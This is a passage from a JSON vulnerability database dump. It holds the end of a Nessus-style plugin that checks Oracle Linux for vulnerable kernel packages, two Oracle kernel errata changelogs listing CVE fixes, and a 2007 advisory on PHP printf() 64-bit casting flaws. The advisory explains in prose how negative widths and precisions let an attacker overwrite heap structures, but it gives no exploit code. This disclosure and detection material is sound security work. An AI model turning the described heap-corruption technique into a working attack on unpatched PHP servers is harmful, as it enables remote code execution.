(!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-2.6.39-400.298.3.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-debug-2.6.39-400.298.3.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-devel-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-debug-devel-2.6.39-400.298.3.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-devel-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-devel-2.6.39-400.298.3.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-doc-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-doc-2.6.39-400.298.3.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-firmware-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-firmware-2.6.39-400.298.3.el6uek\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "oraclelinux": [{"lastseen": "2018-08-31T01:48:55", "bulletinFamily": "unix", "description": "kernel-uek\n[3.8.13-118.20.3]\n- gre: fix a possible skb leak (Eric Dumazet) [Orabug: 26403972] {CVE-2017-9074}\n- ipv6: Fix leak in ipv6_gso_segment(). (David S. Miller) [Orabug: 26403972] {CVE-2017-9074}\n- ipv6: xfrm: Handle errors reported by xfrm6_find_1stfragopt() (Ben Hutchings) [Orabug: 26403972] {CVE-2017-9074}\n- ipv6: Check ip6_find_1stfragopt() return value properly. (David S. Miller) [Orabug: 26403972] {CVE-2017-9074}\n- ipv6: Prevent overrun when parsing v6 header options (Craig Gallek) [Orabug: 26403972] {CVE-2017-9074}\n- tcp: initialize rcv_mss to TCP_MIN_MSS instead of 0 (Wei Wang) [Orabug: 26813390] {CVE-2017-14106}\n- rxrpc: Fix several cases where a padded len isn't checked in ticket decode (David Howells) [Orabug: 26880517] {CVE-2017-7482} {CVE-2017-7482}\n- xen/mmu: Call xen_cleanhighmap() with 4MB aligned for page tables mapping (Zhenzhong Duan) [Orabug: 26883322] \n- KVM: x86: fix deadlock in clock-in-progress request handling (Marcelo Tosatti) [Orabug: 27065995] \n- ocfs2: fstrim: Fix start offset of first cluster group during fstrim (Ashish Samant) [Orabug: 27099835] \n- USB: serial: console: fix use-after-free after failed setup (Johan Hovold) [Orabug: 27206837] {CVE-2017-16525}\n- uwb: properly check kthread_run return value (Andrey Konovalov) [Orabug: 27206897] {CVE-2017-16526}\n- ALSA: usb-audio: Check out-of-bounds access by corrupted buffer descriptor (Takashi Iwai) [Orabug: 27206928] {CVE-2017-16529}\n- USB: fix out-of-bounds in usb_set_configuration (Greg Kroah-Hartman) [Orabug: 27207240] {CVE-2017-16531}\n- USB: core: fix out-of-bounds access bug in usb_get_bos_descriptor() (Alan Stern) [Orabug: 27207983] {CVE-2017-16535}\n- dccp: CVE-2017-8824: use-after-free in DCCP code (Mohamed Ghannam) [Orabug: 27290301] {CVE-2017-8824}", "modified": "2018-02-26T00:00:00", "published": "2018-02-26T00:00:00", "id": "ELSA-2018-4040", "href": "http://linux.oracle.com/errata/ELSA-2018-4040.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T01:49:09", "bulletinFamily": "unix", "description": "[2.6.39-400.298.3]\n- ext4: limit group search loop for non-extent files (Lachlan McIlroy) [Orabug: 17488415] \n- ext4: fixup 64-bit divides in 3.0-stable backport of upstream fix (Todd Poynor) [Orabug: 17488415] \n- ext4: use atomic64_t for the per-flexbg free_clusters count (Theodore Ts'o) [Orabug: 17488415] \n- ext4: init pagevec in ext4_da_block_invalidatepages (Eric Sandeen) [Orabug: 17488415] \n- ext4: do not try to write superblock on ro remount w/o journal (Michael Tokarev) [Orabug: 17488415] \n- xen-netback: fix grant_copy_op array size (Niranjan Patil) [Orabug: 25653941] \n- xen-netback: explicitly check max_slots_needed against meta_prod counter (Niranjan Patil) [Orabug: 25653941] \n- xen-netback: Fix handling of skbs requiring too many slots (Zoltan Kiss) [Orabug: 25653941] \n- xen-netback: worse-case estimate in xenvif_rx_action is underestimating (Paul Durrant) [Orabug: 25653941] \n- xen-netback: Add worse-case estimates of max_slots_needed in netbk_rx_action (Niranjan Patil) [Orabug: 25653941] \n- KEYS: Remove key_type::match in favour of overriding default by match_preparse (Tim Tianyang Chen) [Orabug: 25757946] {CVE-2017-6951}\n- xen/mmu: Call xen_cleanhighmap() with 4MB aligned for page tables mapping (Zhenzhong Duan) [Orabug: 26737475] \n- tcp: initialize rcv_mss to TCP_MIN_MSS instead of 0 (Wei Wang) [Orabug: 26813391] {CVE-2017-14106}\n- rxrpc: Fix several cases where a padded len isn't checked in ticket decode (David Howells) [Orabug: 26880520] {CVE-2017-7482} {CVE-2017-7482}\n- ocfs2: fstrim: Fix start offset of first cluster group during fstrim (Ashish Samant) [Orabug: 27099836] \n- Check validity of cl_rpcclient in nfs_server_list_show (Malahal Naineni) [Orabug: 27112186] \n- USB: serial: console: fix use-after-free after failed setup (Johan Hovold) [Orabug: 27206839] {CVE-2017-16525}\n- ALSA: usb-audio: Check out-of-bounds access by corrupted buffer descriptor (Takashi Iwai) [Orabug: 27206934] {CVE-2017-16529}\n- USB: fix out-of-bounds in usb_set_configuration (Greg Kroah-Hartman) [Orabug: 27207243] {CVE-2017-16531}\n- dccp: CVE-2017-8824: use-after-free in DCCP code (Mohamed Ghannam) [Orabug: 27290308] {CVE-2017-8824}", "modified": "2018-02-26T00:00:00", "published": "2018-02-26T00:00:00", "id": "ELSA-2018-4041", "href": "http://linux.oracle.com/errata/ELSA-2018-4041.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:21", "bulletinFamily": "software", "description": "\r\nSummary\r\n\r\nA helper function used by the printf() PHP function family returns a unsigned 63 bit long, but the result is internally stored in 32 bit ints. Because of the 32 bit truncation the resulting ints can be negative which is not catched by the calling code in differen code paths. This can result in two different exploitable memory corruptions.\r\nAffected versions\r\n\r\nAffected are PHP 4 < 4.4.6 and PHP 5 < 5.2.1\r\nDetailed information\r\n\r\nThe printf() PHP function family internally uses the php_formatted_print() function that parses the format string and handles the embedded format specifiers. The function supports the usual format string syntax with selectable argument numbers via the $ modifier and widths and precisions. It will only accept positive a argument number, width or precision. All three are extracted by the use of the php_sprintf_getnumber() function.\r\n\r\ninline static long\r\nphp_sprintf_getnumber(char *buffer, int *pos)\r\n{\r\n char *endptr;\r\n register long num = strtol(&buffer[*pos], &endptr, 10);\r\n register int i = 0;\r\n\r\n if (endptr != NULL) {\r\n i = (endptr - &buffer[*pos]);\r\n }\r\n PRINTF_DEBUG(("sprintf_getnumber: number was %d bytes long\n", i));\r\n *pos += i;\r\n return num;\r\n}\r\n\r\nUnfortunately the function works internally with the long variable type that is 64 bit wide on 64 bit systems. Because the calling code ensures that the number starts with a digit and not with a minus sign the result will always be a positive long number. However argument number, width and precision are stored as ints and therefore a 64 to 32 bit truncation occurs that can result in negative numbers.\r\n\r\nThis leads to two problems. First the argument number is only checked against an upper limit and because the code assumes that negative numbers are not possible it will not handle them correctly, which results in arbitrary memory addresses being referencable on 64 bit systems. This can result in the disclosure of arbitrary memory addresses or in exploitable memory corruptions.\r\n\r\nThe second problem introduced by this casting vulnerability is within the php_sprintf_appendstring() subfunction that handles the s format specifier. When a width and a precision of -1 are specified this will result in the buffer postition being decreased by one. By repeating the pattern multiple times it is possible to move the buffer posititon into to heap area infront of the actual buffer. Once the internal buffer pointer if over something like a heap control structure they can be overwritten with normal characters inside the format string.\r\n\r\nBoth exploit paths allow for code execution, however the second path is much easier and stable to exploit. Especially from remote.\r\n\r\nUnlike C Format String Vulnerabilities PHP Format String Vulnerabilities only work on 64 bit systems and only when there is atleast one parameter after the format string in the printf() alike function.\r\nProof of concept, exploit or instructions to reproduce\r\n\r\nPOC will be released during the next week\r\nNotes\r\n\r\nBecause the described problem was fixed in PHP 4.4.5 and PHP 5.2.1 after we reported it to the PHP developers, the newborn class of PHP Application Format String Vulnerabilities should be already dead again.\r\n", "modified": "2007-03-31T00:00:00", "published": "2007-03-31T00:00:00", "id": "SECURITYVULNS:DOC:16531", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:16531", "title": "MOPB-38-2007:PHP printf() Family 64 Bit Casting Vulnerabilities", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}
